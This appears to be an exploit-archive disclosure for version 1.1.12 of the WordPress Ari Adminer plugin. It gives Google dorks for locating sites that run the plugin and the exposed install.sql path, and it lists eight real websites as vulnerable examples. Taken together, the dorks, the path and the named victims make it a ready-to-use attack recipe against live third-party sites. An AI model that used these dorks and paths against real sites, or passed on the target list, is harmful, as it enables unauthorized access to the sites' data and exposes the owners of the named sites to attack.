#################################################################################################

# Exploit Title : WordPress Ari Adminer Plugins 1.1.12 Database Backup
Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 06/12/2018
# Vendor Homepage : ari-soft.com ~ wordpress.org/plugins/ari-adminer/
# Software Download Link : downloads.wordpress.org/plugin/ari-adminer.zip
+ github.com/andrewcy86/ari-adminer/archive/master.zip
+ ari-soft.com/Latest/wordpress-db-manager.html?_2018120603
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.1.12
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/ari-adminer/''
intext:''MAY=leeksperten ITAS - presisjon for perfeksjon'' site:no
intext:''A(c) 2018 M. Bradbury Photography''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

# Admin Panel Login Path :

/wp-login.php

# Exploit :

/wp-content/plugins/ari-adminer/install/install.sql

#################################################################################################

# Example Vulnerable Sites =>

[+]
mbradburyphotography.com/wp-content/plugins/ari-adminer/install/install.sql

[+]
clubjimmy.com/WordPress3/wp-content/plugins/ari-adminer/install/install.sql

[+] designbuildideas.eu/wp-content/plugins/ari-adminer/install/install.sql

[+] mygrapefruit.com/wp-content/plugins/ari-adminer/install/install.sql

[+] voleibol.pe/wp-content/plugins/ari-adminer/install/install.sql

[+] it-as.no/wp-content/plugins/ari-adminer/install/install.sql

[+] sapeople.com/wp-content/plugins/ari-adminer/install/install.sql

[+] waupacanow.com/wp-content/plugins/ari-adminer/install/install.sql

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################